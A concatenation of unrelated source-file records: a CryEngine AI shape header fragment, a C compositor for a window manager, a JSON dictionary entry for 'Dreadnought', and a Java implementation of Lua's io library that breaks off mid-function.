bool temporary; /// Flag indicating if the path is temporary and should be deleted upon reset.
bool enabled; /// Flag indicating if the shape is enabled. Disabled shapes are excluded from queries.
EAILightLevel lightLevel; /// The light level modifier of the shape.
bool closed; /// Flag indicating if the shape is a closed volume
class ShapeMaskPtr
{
public:
ShapeMaskPtr(CShapeMask* ptr = 0)
: m_p(ptr) {}
ShapeMaskPtr(const ShapeMaskPtr& other)
: m_p(0)
{
if (other.m_p)
{
m_p = new CShapeMask;
* m_p = *other.m_p;
}
}
~ShapeMaskPtr() { SAFE_DELETE(m_p); }
CShapeMask* operator->() {return m_p; }
const CShapeMask* operator->() const {return m_p; }
CShapeMask& operator*() {return *m_p; }
const CShapeMask& operator*() const {return *m_p; }
operator CShapeMask*() {
return m_p;
}
CShapeMask* Get() {return m_p; }
const CShapeMask* Get() const {return m_p; }
private:
CShapeMask* m_p;
};
ShapeMaskPtr shapeMask; /// Optional mask for this shape that speeds up 2D in/out/edge tests
};
typedef std::map<string, SShape> ShapeMap;
struct SPerceptionModifierShape
: SShape
{
SPerceptionModifierShape(const ListPositions& shape, float reductionPerMetre, float reductionMax, float fHeight, bool isClosed);
float fReductionPerMetre;
float fReductionMax;
};
typedef std::map<string, SPerceptionModifierShape> PerceptionModifierShapeMap;
#endif // CRYINCLUDE_CRYAISYSTEM_SHAPE2_H
| 2,301 |
453 | <filename>programs/awm/composite.c
#include <unistd.h>
#include <stdint.h>
#include <stdlibadd/assert.h>
#include <stdlibadd/array.h>
#include <agx/lib/shapes.h>
#include "window.h"
#include "awm_internal.h"
#include "composite.h"
array_t* _g_screen_rects_to_update_this_cycle = NULL;
/* Queue a composite for the provided rect over the entire desktop
While compositing the frame, awm will determine what individual elements
must be redrawn to composite the provided rectangle.
These may include portions of windows, the desktop background, etc.
*/
void compositor_queue_rect_to_redraw(Rect update_rect) {
if (update_rect.size.width == 0 || update_rect.size.height == 0) {
// TODO(PT): Investigate how this happens? Trigger by quickly resizing a window to flood events
//printf("Dropping update rect of zero height or width\n");
return;
}
if (_g_screen_rects_to_update_this_cycle->size + 1 >= _g_screen_rects_to_update_this_cycle->max_size) {
//printf("Dropping update rect because we've hit our max updates this cycle: (%d, %d), (%d, %d)\n", rect_min_x(update_rect), rect_min_y(update_rect), update_rect.size.width, update_rect.size.height);
return;
}
Rect* r = calloc(1, sizeof(Rect));
r->origin.x = update_rect.origin.x;
r->origin.y = update_rect.origin.y;
r->size.width = update_rect.size.width;
r->size.height = update_rect.size.height;
array_insert(_g_screen_rects_to_update_this_cycle, r);
}
/* Queue composites for the area of the bg rectangle that's not obscured by the fg rectangle
*/
void compositor_queue_rect_difference_to_redraw(Rect bg, Rect fg) {
array_t* delta = rect_diff(bg, fg);
for (int32_t i = delta->size - 1; i >= 0; i--) {
Rect* r = array_lookup(delta, i);
compositor_queue_rect_to_redraw(*r);
free(r);
}
array_destroy(delta);
}
void compositor_init(void) {
_g_screen_rects_to_update_this_cycle = array_create(256);
}
void compositor_render_frame(void) {
ca_layer* desktop_background = desktop_background_layer();
array_t* all_views = all_desktop_views();
ca_layer* video_memory = video_memory_layer();
ca_layer* physical_video_memory = physical_video_memory_layer();
// Fetch remote layers for windows that have asked for a redraw
windows_fetch_queued_windows();
// Process rects that have been dirtied while processing other events
for (int32_t i = 0; i < _g_screen_rects_to_update_this_cycle->size; i++) {
Rect* rp = array_lookup(_g_screen_rects_to_update_this_cycle, i);
Rect r = *rp;
array_t* unobscured_region = array_create(256);
rect_add(unobscured_region, r);
// Handle the parts of the dirty region that are obscured by desktop views
for (int32_t j = 0; j < all_views->size; j++) {
view_t* view = array_lookup(all_views, j);
// We can't occlude using a view if the view uses transparency
if (view->layer->alpha < 1.0) {
continue;
}
if (!rect_intersects(view->frame, r)) {
continue;
}
for (int32_t k = 0; k < view->drawable_rects->size; k++) {
Rect* visible_region_ptr = array_lookup(view->drawable_rects, k);
Rect visible_region = *visible_region_ptr;
if (rect_intersects(visible_region, r)) {
if (rect_contains_rect(visible_region, r)) {
// The entire rect should be redrawn from this window
rect_add(view->extra_draws_this_cycle, r);
// And subtract the area of the rect from the region to update
unobscured_region = update_occlusions(unobscured_region, r);
break;
}
else {
// This view needs to redraw the intersection of its visible rect and the update rect
Rect intersection = rect_intersect(visible_region, r);
rect_add(view->extra_draws_this_cycle, intersection);
unobscured_region = update_occlusions(unobscured_region, intersection);
}
// If all the area of the region to update has been handled,
// stop iterating windows early
if (!unobscured_region->size) {
break;
}
}
}
}
// Blit the regions that are not covered by windows with the desktop background layer
for (int32_t j = unobscured_region->size - 1; j >= 0; j--) {
Rect* bg_rect = array_lookup(unobscured_region, j);
blit_layer(
video_memory,
desktop_background,
*bg_rect,
*bg_rect
);
array_remove(unobscured_region, j);
free(bg_rect);
}
array_destroy(unobscured_region);
}
array_t* desktop_views_to_composite = desktop_views_ready_to_composite_array();
draw_views_to_layer(desktop_views_to_composite, video_memory);
draw_queued_extra_draws(all_views, video_memory);
Rect mouse_rect = _draw_cursor(video_memory);
// Blit everything we drew above to the memory-mapped framebuffer
for (int32_t i = _g_screen_rects_to_update_this_cycle->size - 1; i >= 0; i--) {
Rect* r = array_lookup(_g_screen_rects_to_update_this_cycle, i);
blit_layer(
physical_video_memory,
video_memory,
*r,
*r
);
array_remove(_g_screen_rects_to_update_this_cycle, i);
free(r);
}
complete_queued_extra_draws(all_views, video_memory, physical_video_memory);
for (int32_t i = 0; i < desktop_views_to_composite->size; i++) {
view_t* view = array_lookup(desktop_views_to_composite, i);
for (int32_t j = 0; j < view->drawable_rects->size; j++) {
Rect* r_ptr = array_lookup(view->drawable_rects, j);
Rect r = *r_ptr;
blit_layer(physical_video_memory, video_memory, r, r);
}
}
blit_layer(physical_video_memory, video_memory, mouse_rect, mouse_rect);
desktop_views_flush_queues();
array_destroy(all_views);
}
| 2,140 |
335 | {
"word": "Dreadnought",
"definitions": [
"A type of battleship introduced in the early 20th century, larger and faster than its predecessors and equipped entirely with large-calibre guns.",
"A fearless person.",
"A heavy overcoat for stormy weather."
],
"parts-of-speech": "Noun"
} | 115 |
1,968 | <reponame>agramonte/corona
// Copyright (c) 2008 Groundspeak, Inc.
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation
// files (the "Software"), to deal in the Software without
// restriction, including without limitation the rights to use,
// copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the
// Software is furnished to do so, subject to the following
// conditions:
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
// OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
// HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
// WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
// OTHER DEALINGS IN THE SOFTWARE.
//
package com.groundspeak.mochalua;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Enumeration;
import java.util.Vector;
import javax.microedition.io.Connector;
import javax.microedition.io.file.FileConnection;
import javax.microedition.io.file.FileSystemRegistry;
/**
*
* @author p.pavelko
*/
class LuaIOLib {
public final static int IO_INPUT = 1;
public final static int IO_OUTPUT = 2;
public final static int SEEK_CUR = 1;
public final static int SEEK_END = 2;
public final static int SEEK_SET = 0;
public final static int _IOFBF = 0x0000;
public final static int _IOLBF = 0x0040;
public final static int _IONBF = 0x0004;
//public final static int LIMIT = 10;
public final static String[] fnames = { "input", "output" };
static class FileStruct {
public static final int ACCESS_MODE_READ = 0;
public static final int ACCESS_MODE_WRITE = 1;
public static final int ACCESS_MODE_APPEND = 2;
public static final int ACCESS_MODE_READ_PLUS = 3;
public static final int ACCESS_MODE_WRITE_PLUS = 4;
public static final int ACCESS_MODE_APPEND_PLUS = 5;
private static final int OP_NONE = 0;
private static final int OP_READ = 1;
private static final int OP_WRITE = 2;
public StringBuffer buffer = null;
public int bufferPosition = 0;
public FileConnection connection = null;
public InputStream inputStream = null;
public OutputStream outputStream = null;
public boolean binaryMode = false;
public int accessMode = ACCESS_MODE_READ;
public boolean isTmpFile = false;
public int bufferingType = _IOFBF;
public int bufferSize = LuaAPI.LUAL_BUFFERSIZE;
public int bufferCounter = 0;
public boolean isClosed = false;
private boolean isFlushed = true;
private int lastOp = OP_NONE;
public boolean bothRWMode = false;
public int fread ( StringBuffer buf, int size, int count ) {
if ( bothRWMode && lastOp == OP_WRITE ) {
return -1;
}
try {
switch ( accessMode ) {
case ACCESS_MODE_WRITE:
case ACCESS_MODE_APPEND: {
return -1;
}
case ACCESS_MODE_READ: {
if ( inputStream == null )
inputStream = connection.openInputStream ();
if ( inputStream == null )
return -1;
int k = 0;
int i = 0;
lastOp = OP_READ;
for (; i < count * size; i ++ ) {
k = inputStream.read ();
if ( k == -1 )
return -1;
buf.append ( ( char ) k );
bufferPosition ++;
}
return i;
}
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE_PLUS:
case ACCESS_MODE_APPEND_PLUS: {
int i = 0;
lastOp = OP_READ;
for (; i < count * size; i ++ ) {
if ( bufferPosition >= buffer.length () )
return -1;
buf.append ( buffer.charAt ( bufferPosition ++ ) );
}
return i;
}
}
}
catch ( Exception ex ) {
return -1;
}
return -1;
}
public int fwrite ( String buf, int size, int count ) {
if ( bothRWMode && lastOp == OP_READ ) {
return -1;
}
switch ( accessMode ) {
case ACCESS_MODE_READ: {
return -1;
}
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE:
case ACCESS_MODE_WRITE_PLUS: {
int i = 0;
lastOp = OP_WRITE;
isFlushed = false;
for (; i < count * size; i ++ ) {
bufferCounter ++;
if ( bufferPosition >= buffer.length () ) {
buffer.append ( buf.charAt ( i ) );
bufferPosition ++;
}
else {
buffer.setCharAt ( bufferPosition ++, buf.charAt ( i ) );
}
}
switch ( bufferingType ) {
case _IOFBF:
{
if ( bufferCounter > bufferSize ) {
try {
fflush ();
bufferCounter = 0;
}
catch ( Exception ex ) {
return -1;
}
}
}
break;
case _IOLBF:
{
if ( buf.toString ().indexOf ( "\n" ) != -1 || bufferCounter > bufferSize ) {
try {
fflush ();
if ( bufferCounter > bufferSize )
bufferCounter = 0;
}
catch ( Exception ex ) {
return -1;
}
}
}
break;
case _IONBF:
{
try {
fflush ();
}
catch ( Exception ex ) {
return -1;
}
}
break;
}
return i;
}
case ACCESS_MODE_APPEND:
case ACCESS_MODE_APPEND_PLUS: {
int i = 0;
isFlushed = false;
lastOp = OP_WRITE;
for (; i < count * size; i ++ ) {
bufferCounter ++;
buffer.append ( buf.charAt ( i ) );
}
bufferPosition = buffer.length ();
switch ( bufferingType ) {
case _IOFBF:
{
if ( bufferCounter > bufferSize ) {
try {
fflush ();
bufferCounter = 0;
}
catch ( Exception ex ) {
return -1;
}
}
}
break;
case _IOLBF:
{
if ( buf.toString ().indexOf ( "\n" ) != -1 || bufferCounter > bufferSize ) {
try {
fflush ();
if ( bufferCounter > bufferSize )
bufferCounter = 0;
}
catch ( Exception ex ) {
return -1;
}
}
}
break;
case _IONBF:
{
try {
fflush ();
}
catch ( Exception ex ) {
return -1;
}
}
break;
}
return i;
}
}
return -1;
}
public double readNumber () throws Exception {
if ( bothRWMode && lastOp == OP_WRITE ) {
return -1;
}
switch ( accessMode ) {
case ACCESS_MODE_WRITE:
case ACCESS_MODE_APPEND: {
return -1;
}
case ACCESS_MODE_READ: {
if ( inputStream == null )
inputStream = connection.openInputStream ();
if ( inputStream == null )
throw new Exception ();
int k = 0;
lastOp = OP_READ;
StringBuffer sb = new StringBuffer ();
boolean isNonWSCharOccurred = false;
for (;;) {
k = inputStream.read ();
bufferPosition ++;
switch ( k ) {
case ' ':
case '\n':
case '\t': {
if ( isNonWSCharOccurred == false ) {
continue;
}
bufferPosition --;
inputStream.reset ();
inputStream.skip ( bufferPosition );
Double res = new Double ( ( ( Double ) Double.valueOf ( sb.toString () ) ).doubleValue () );
if ( res != null ) {
return res.doubleValue ();
}
else {
throw new Exception ( "readNumber: String is not number" );
}
}
case -1: {
Double res = new Double ( ( ( Double ) Double.valueOf ( sb.toString () ) ).doubleValue () );
if ( res != null ) {
return res.doubleValue ();
}
else {
throw new Exception ( "readNumber: String is not number" );
}
}
default:
sb.append ( ( char ) k );
isNonWSCharOccurred = true;
break;
}
}
}
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE_PLUS:
case ACCESS_MODE_APPEND_PLUS: {
lastOp = OP_READ;
StringBuffer buf = new StringBuffer ();
int k = 0;
boolean isNonWSCharOccurred = false;
for (;;) {
k = buffer.charAt ( bufferPosition ++ );
switch ( k ) {
case ' ':
case '\n':
case '\t': {
if ( isNonWSCharOccurred == false ) {
continue;
}
bufferPosition --;
Double res = new Double ( ( ( Double ) Double.valueOf ( buf.toString () ) ).doubleValue () );
if ( res != null ) {
return res.doubleValue ();
}
else {
throw new Exception ( "readNumber: String is not number" );
}
}
case -1: {
Double res = new Double ( ( ( Double ) Double.valueOf ( buf.toString () ) ).doubleValue () );
if ( res != null ) {
return res.doubleValue ();
}
else {
throw new Exception ( "readNumber: String is not number" );
}
}
default:
buf.append ( ( char ) k );
isNonWSCharOccurred = true;
break;
}
}
}
}
return -1;
}
public StringBuffer fgets ( StringBuffer str, int num ) {
if ( bothRWMode && lastOp == OP_WRITE ) {
return null;
}
try {
switch ( accessMode ) {
case ACCESS_MODE_WRITE:
case ACCESS_MODE_APPEND: {
return null;
}
case ACCESS_MODE_READ: {
lastOp = OP_READ;
if ( inputStream == null )
inputStream = connection.openInputStream ();
if ( inputStream == null )
return null;
int k = 0;
for ( int i = 0; i < num; i ++ ) {
k = inputStream.read ();
if ( k == -1 ) {
return null;
}
str.append ( ( char ) k );
bufferPosition ++;
if ( ( ( char ) k ) == '\n' )
return str;
}
return str;
}
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE_PLUS:
case ACCESS_MODE_APPEND_PLUS: {
lastOp = OP_READ;
for ( int i = 0; i < num; i ++ ) {
if ( bufferPosition >= buffer.length () ) {
if ( i == 0 )
return null;
else
return str;
}
else {
str.append ( buffer.charAt ( bufferPosition ) );
if ( buffer.charAt ( bufferPosition ++ ) == '\n' )
return str;
}
}
return str;
}
}
return null;
}
catch ( Exception ex ) {
return null;
}
}
public int ftell () {
return bufferPosition;
}
public int fseek ( long offset, int origin ) throws Exception {
fflush ();
switch ( origin ) {
case SEEK_SET:
{
if ( offset < 0 )
return 1;
switch ( accessMode ) {
case ACCESS_MODE_READ: {
if ( connection == null )
return 1;
if ( inputStream == null )
inputStream = connection.openInputStream ();
if ( inputStream == null )
return 1;
inputStream.reset ();
inputStream.skip ( offset );
bufferPosition = ( int ) ( offset );
return 0;
}
case ACCESS_MODE_WRITE:
case ACCESS_MODE_APPEND:
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE_PLUS:
case ACCESS_MODE_APPEND_PLUS: {
bufferPosition = ( int ) ( offset );
return 0;
}
}
}
break;
case SEEK_CUR:
{
switch ( accessMode ) {
case ACCESS_MODE_READ: {
if ( connection == null )
return 1;
if ( inputStream == null )
inputStream = connection.openInputStream ();
if ( inputStream == null )
return 1;
bufferPosition += ( int ) ( offset );
if ( bufferPosition < 0 )
bufferPosition = 0;
if ( offset > 0 ) {
inputStream.skip ( offset );
return 0;
}
else {
inputStream.reset ();
inputStream.skip ( bufferPosition );
return 0;
}
}
case ACCESS_MODE_WRITE:
case ACCESS_MODE_APPEND:
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE_PLUS:
case ACCESS_MODE_APPEND_PLUS: {
bufferPosition += ( int ) ( offset );
if ( bufferPosition < 0 )
bufferPosition = 0;
return 0;
}
}
}
break;
case SEEK_END:
{
if ( offset < 0 )
return 1;
switch ( accessMode ) {
case ACCESS_MODE_READ: {
if ( connection == null )
return 1;
if ( inputStream == null )
inputStream = connection.openInputStream ();
if ( inputStream == null )
return 1;
int fileSize = 0;
byte c;
int j = 0;
inputStream.reset ();
while ( ( j = inputStream.read () ) != -1 ) {
fileSize ++;
}
inputStream.reset ();
bufferPosition = fileSize - ( int ) offset;
if ( bufferPosition < 0 )
bufferPosition = 0;
inputStream.skip ( bufferPosition );
return 0;
}
case ACCESS_MODE_WRITE:
case ACCESS_MODE_APPEND:
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE_PLUS:
case ACCESS_MODE_APPEND_PLUS: {
int fileSize = buffer.length ();
bufferPosition = fileSize - ( int ) offset;
if ( bufferPosition < 0 )
bufferPosition = 0;
return 0;
}
}
}
break;
}
return 1;
}
public int fflush () throws Exception {
lastOp = OP_NONE;
switch ( accessMode ) {
case ACCESS_MODE_READ: {
return 0;
}
case ACCESS_MODE_WRITE:
case ACCESS_MODE_APPEND:
case ACCESS_MODE_READ_PLUS:
case ACCESS_MODE_WRITE_PLUS:
case ACCESS_MODE_APPEND_PLUS: {
if ( connection == null )
return 1;
if ( outputStream != null ) {
outputStream.close ();
outputStream = null;
}
outputStream = connection.openOutputStream ();
if ( outputStream == null )
return 1;
if ( isFlushed ) {
return 0;
}
else {
outputStream.write ( buffer.toString ().getBytes () );
isFlushed = true;
return 0;
}
}
}
return 0;
}
public int fclose () {
if ( isClosed ) {
return -1;
}
try {
if ( fflush () != 0 )
return -1;
if ( inputStream != null ) {
inputStream.close ();
inputStream = null;
}
if ( outputStream != null ) {
outputStream.close ();
outputStream = null;
}
if ( connection != null ) {
if ( isTmpFile && connection.exists () ) {
connection.delete ();
}
connection.close ();
connection = null;
}
if ( buffer != null ) {
buffer = null;
}
if ( tempFiles != null && tempFiles.contains ( this ) ) {
tempFiles.removeElement ( this );
}
System.gc ();
isClosed = true;
return 0;
}
catch ( Exception ex ) {
return -1;
}
}
public int setvbuf ( int mode, int buffSize ) {
if ( buffSize <= 0 && mode != _IONBF )
return 1;
bufferingType = mode;
bufferSize = buffSize;
return 0;
}
}
public static final String LUA_IOLIBNAME = "io";
private static Vector tempFiles = null;
public static void clearTempFilesVector () {
if ( tempFiles != null ) {
int size = tempFiles.size ();
for ( int i = 0; i < size; i ++ ) {
FileStruct file = ( FileStruct ) tempFiles.elementAt ( i );
file.fclose ();
}
tempFiles.removeAllElements ();
tempFiles = null;
}
}
public static FileStruct fopen ( FileStruct file, String filename ) {
return fopen ( file, filename, "r" );
}
public static FileStruct tmpfile ( lua_State thread, FileStruct file ) {
file.isTmpFile = true;
Enumeration roots = FileSystemRegistry.listRoots ();
String root = null;
while ( roots.hasMoreElements () ) {
root = ( String ) roots.nextElement ();
if ( root != null ) {
root = "/" + root;
break;
}
}
if ( root == null ) {
LuaAPI.luaL_error ( thread, "There are no available FileSystem root for temp file creation" );
}
root += System.currentTimeMillis () + ".txt";
file = fopen ( file, root, "w+" );
if ( file != null ) {
if ( tempFiles == null ) {
tempFiles = new Vector ();
}
tempFiles.addElement ( file );
}
return file;
}
public static FileStruct fopen ( FileStruct file, String filename, String mode ) {
if ( filename == null || mode == null )
return null;
if ( ! filename.startsWith ( "file://" ) )
filename = "file://" + filename;
file.buffer = new StringBuffer ();
if ( mode.indexOf ( "b" ) != -1 )
file.binaryMode = true;
file.bothRWMode = false;
if ( mode.indexOf ( "+" ) != -1 )
file.bothRWMode = true;
if ( mode.indexOf ( "r" ) != -1 ) {
if ( file.bothRWMode )
file.accessMode = FileStruct.ACCESS_MODE_READ_PLUS;
else
file.accessMode = FileStruct.ACCESS_MODE_READ;
}
if ( mode.indexOf ( "w" ) != -1 ) {
if ( file.bothRWMode )
file.accessMode = FileStruct.ACCESS_MODE_WRITE_PLUS;
else
file.accessMode = FileStruct.ACCESS_MODE_WRITE;
}
if ( mode.indexOf ( "a" ) != -1 ) {
if ( file.bothRWMode )
file.accessMode = FileStruct.ACCESS_MODE_APPEND_PLUS;
else
file.accessMode = FileStruct.ACCESS_MODE_APPEND;
}
try {
//int mode1 = 0;
// if(file.accessMode == FileStruct.ACCESS_MODE_WRITE || file.accessMode == FileStruct.ACCESS_MODE_WRITE_PLUS)
// {
file.connection = ( FileConnection ) Connector.open ( filename );
// }
// else
// {
// mode1 = Connector.READ_WRITE;
// }
if ( file.connection == null )
return null;
if ( ! file.connection.exists () ) {
if ( file.accessMode == FileStruct.ACCESS_MODE_READ || file.accessMode == FileStruct.ACCESS_MODE_READ_PLUS ) {
return null;
}
else if ( file.accessMode == FileStruct.ACCESS_MODE_APPEND || file.accessMode == FileStruct.ACCESS_MODE_APPEND_PLUS || file.accessMode == FileStruct.ACCESS_MODE_WRITE || file.accessMode == FileStruct.ACCESS_MODE_WRITE_PLUS )
file.connection.create ();
}
else if ( file.accessMode == FileStruct.ACCESS_MODE_WRITE || file.accessMode == FileStruct.ACCESS_MODE_WRITE_PLUS ) {
file.connection.delete ();
file.connection.close ();
file.connection = null;
file.connection = ( FileConnection ) Connector.open ( filename );
if ( ! file.connection.exists () ) {
file.connection.create ();
}
}
if ( file.accessMode == FileStruct.ACCESS_MODE_APPEND || file.accessMode == FileStruct.ACCESS_MODE_APPEND_PLUS || file.accessMode == FileStruct.ACCESS_MODE_READ_PLUS ) {
file.inputStream = file.connection.openInputStream ();
if ( file.inputStream == null )
return null;
int j = 0;
while ( ( j = file.inputStream.read () ) != -1 ) {
file.buffer.append ( ( char ) j );
}
if ( file.accessMode == FileStruct.ACCESS_MODE_READ_PLUS )
file.bufferPosition = 0;
else
file.bufferPosition = file.buffer.length ();
}
else {
file.bufferPosition = 0;
}
if ( file.accessMode == FileStruct.ACCESS_MODE_READ ) {
file.inputStream = file.connection.openInputStream ();
if ( file.inputStream == null )
return null;
else
file.inputStream.mark ( Integer.MAX_VALUE );
}
}
catch ( Exception ex ) {
if ( file != null ) {
if ( file.inputStream != null ) {
try {
file.inputStream.close ();
}
catch ( IOException e ) {
}
finally {
file.inputStream = null;
}
}
if ( file.connection != null ) {
try {
file.connection.close ();
}
catch ( IOException e ) {
}
finally {
file.connection = null;
}
}
}
return null;
}
finally {
}
return file;
}
static int test_eof ( lua_State thread, FileStruct f ) {
int c = f.fread ( new StringBuffer (), 1, 1 );
if ( c != -1 ) {
try {
f.fseek ( -1, SEEK_CUR );
}
catch ( Exception ex ) {
return 0;
}
}
LuaAPI.lua_pushlstring ( thread, "", 0 );
return c != -1 ? 1 : 0;
}
static int read_chars ( lua_State thread, FileStruct file, int n ) {
int rlen; /* how much to read */
int nr; /* number of chars actually read */
StringBuffer p = new StringBuffer ();
rlen = LuaAPI.LUAL_BUFFERSIZE; /* try to read that much each time */
if ( rlen > n ) /* cannot read more than asked */
rlen = n;
do {
nr = file.fread ( p, 1, rlen );
n -= nr; /* still have to read `n' chars */
} while ( n > 0 && nr == rlen ); /* until end of count or eof */
LuaAPI.lua_pushstring ( thread, p.toString () );
int res = 0;
if ( n == 0 || LuaAPI.lua_objlen ( thread, -1 ) > 0 )
res = 1;
return res;
}
static void read_number ( lua_State thread, FileStruct file ) throws Exception {
//Double d = Scanf.readNumber(file.inputStream);
double d = file.readNumber ();
LuaAPI.lua_pushnumber ( thread, d );
}
static int read_line ( lua_State thread, FileStruct file ) {
StringBuffer p = new StringBuffer ();
for (;;) {
int l;
if ( file.fgets ( p, LuaAPI.LUAL_BUFFERSIZE ) == null )/* eof? */ {
LuaAPI.lua_pushstring ( thread, p.toString () );// luaL_pushresult(&b); /* close buffer */
int res = 0;
if ( LuaAPI.lua_objlen ( thread, -1 ) > 0 ) /* check whether read something */
res = 1;
return res;
}
//String c = p.toString();
//System.out.println(c);
l = p.length ();
if ( l == 0 || p.charAt ( l - 1 ) != '\n' ) {
//luaL_addsize(&b, l);
}
else {
//luaL_addsize(&b, l - 1); /* do not include `eol' */
String str = p.toString ();
int len = str.length ();
len -= 1;
if ( len < 0 )
len = 0;
LuaAPI.lua_pushstring ( thread, str.substring ( 0, len ) );/* do not include `eol' */
//luaL_pushresult(&b); /* close buffer */
return 1; /* read at least an `eol' */
}
}
}
static int g_read ( lua_State thread, FileStruct file, int first ) {
int nargs = LuaAPI.lua_gettop ( thread ) - 1;
int success;
int n;
if ( nargs == 0 ) /* no arguments? */ {
success = read_line ( thread, file );
n = first + 1; /* to return 1 result */
}
else /* ensure stack space for all results and for auxlib's buffer */ {
LuaAPI.luaL_checkstack ( thread, nargs + LuaAPI.LUA_MINSTACK, "too many arguments" );
success = 1;
for ( n = first; ( nargs -- ) != 0 && success != 0; n ++ ) {
if ( LuaAPI.lua_type ( thread, n ) == /*LUA_TNUMBER*/ 3 ) {
int l = ( int ) LuaAPI.lua_tointeger ( thread, n );
success = ( l == 0 ) ? test_eof ( thread, file ) : read_chars ( thread, file, l );
}
else {
String p = LuaAPI.lua_tostring ( thread, n );
LuaAPI.luaL_argcheck ( thread, p != null && p.charAt ( 0 ) == '*', n, "invalid option" );
switch ( p.charAt ( 1 ) ) {
case 'n': /* number */
success = 1;
try {
read_number ( thread, file );
}
catch ( Exception ex ) {
success = 0;
}
break;
case 'l': /* line */
success = read_line ( thread, file );
break;
case 'a': /* file */
read_chars ( thread, file, Integer.MAX_VALUE ); /* read MAX_SIZE_T chars */
success = 1; /* always success */
break;
default:
return LuaAPI.luaL_argerror ( thread, n, "invalid format" );
}
}
}
}
//if (ferror(f))
// return pushresult(thread, 0, null);
if ( success != 1 ) {
LuaAPI.lua_pop ( thread, 1 ); /* remove last result */
LuaAPI.lua_pushnil ( thread ); /* push nil instead */
}
return n - first;
}
public static final class io_read implements JavaFunction {
public int Call ( lua_State thread ) {
return g_read ( thread, getiofile ( thread, IO_INPUT ), 1 );
}
}
static FileStruct getiofile ( lua_State thread, int findex ) {
FileStruct f = null;
LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, findex );
f = ( FileStruct ) LuaAPI.lua_touserdata ( thread, -1 );
if ( f == null || f.isClosed == true )
LuaAPI.luaL_error ( thread, "standard " + fnames[findex - 1] + " file is closed" );
return f;
}
public static final class f_read implements JavaFunction {
public int Call ( lua_State thread ) {
return g_read ( thread, tofile ( thread ), 2 );
}
}
static int g_iofile ( lua_State thread, int f, String mode ) {
if ( ! LuaAPI.lua_isnoneornil ( thread, 1 ) ) {
String filename = LuaAPI.lua_tostring ( thread, 1 );
if ( filename != null ) {
FileStruct pf = newfile ( thread );
pf = fopen ( pf, filename, mode );
if ( pf == null )
fileerror ( thread, 1, filename );
}
else {
tofile ( thread ); /* check that it's a valid file handle */
LuaAPI.lua_pushvalue ( thread, 1 );
}
LuaAPI.lua_rawseti ( thread, LuaAPI.LUA_ENVIRONINDEX, f );
}
/* return current value */
LuaAPI.lua_rawgeti ( thread, LuaAPI.LUA_ENVIRONINDEX, f );
return 1;
}
public static final class io_input implements JavaFunction {
public int Call ( lua_State thread ) {
return g_iofile ( thread, IO_INPUT, "r" );
}
}
public static final class io_output implements JavaFunction {
public int Call ( lua_State thread ) {
return g_iofile ( thread, IO_OUTPUT, "w" );
}
}
static int g_write ( lua_State thread, FileStruct f, int arg ) {
int nargs = LuaAPI.lua_gettop ( thread ) - 1;
int status = 1;
for (; ( nargs -- ) > 0; arg ++ ) {
if ( LuaAPI.lua_type ( thread, arg ) == LuaAPI.LUA_TNUMBER ) {
/* optimization: could be done exactly as for strings */
/* String str = "" + LuaAPI.lua_tonumber(thread, arg);
int g = str.substring(str.indexOf(".") + 1, str.length()).length();
if(g > 14)
str = str.substring(0, str.length() - (g - 14));
StringBuffer sb = new StringBuffer();
sb.append(str);
if(status == 1 && f.fwrite(sb, 1, sb.length()) > 0)
status = 1;
else
status = 0;
*/
String str = "";
try {
str = new Printf ( "%.14g" ).sprintf ( LuaAPI.lua_tonumber ( thread, arg ) );
}
catch ( Exception ex ) {
status = 0;
}
status = status == 1 && f.fwrite ( str, 1, str.length () ) > 0 ? 1 : 0;
}
else {
String s = LuaAPI.luaL_checklstring ( thread, arg );
int iStrLen = LuaStringLib.StringLength ( s );
status = status == 1 && ( f.fwrite ( s, 1, iStrLen ) == iStrLen ) ? 1 : 0;
}
}
return pushresult ( thread, status, null );
}
public static final class io_write implements JavaFunction {
public int Call ( lua_State thread ) {
return g_write ( thread, getiofile ( thread, IO_OUTPUT ), 1 );
}
}
public static final class f_write implements JavaFunction {
public int Call ( lua_State thread ) {
return g_write ( thread, tofile ( thread ), 2 );
}
}
public static final class f_seek implements JavaFunction {
public int Call ( lua_State thread ) {
final int[] mode = { SEEK_SET, SEEK_CUR, SEEK_END };
final String[] modenames = { "set", "cur", "end" };
FileStruct f = tofile ( thread );
int op = LuaAPI.luaL_checkoption ( thread, 2, "cur", modenames );
long offset = LuaAPI.luaL_optlong ( thread, 3, 0 );
try {
op = f.fseek ( offset, mode[op] );
}
catch ( Exception ex ) {
op = 1;
}
if ( op != 0 )
return pushresult ( thread, 0, null ); /* error */
else {
LuaAPI.lua_pushinteger ( thread, f.ftell () );
return 1;
}
}
}
public static final class io_flush implements JavaFunction {
public int Call ( lua_State thread ) {
int res = 0;
try {
if ( getiofile ( thread, IO_OUTPUT ).fflush () == 0 )
res = 1;
}
catch ( Exception ex ) {
res = 0;
}
return pushresult ( thread, res, null );
}
}
public static final class f_flush implements JavaFunction {
public int Call ( lua_State thread ) {
int res = 0;
try {
if ( tofile ( thread ).fflush () == 0 )
res = 1;
}
catch ( Exception ex ) {
res = 0;
}
return pushresult ( thread, res, null );
}
}
static FileStruct tofile ( lua_State thread ) {
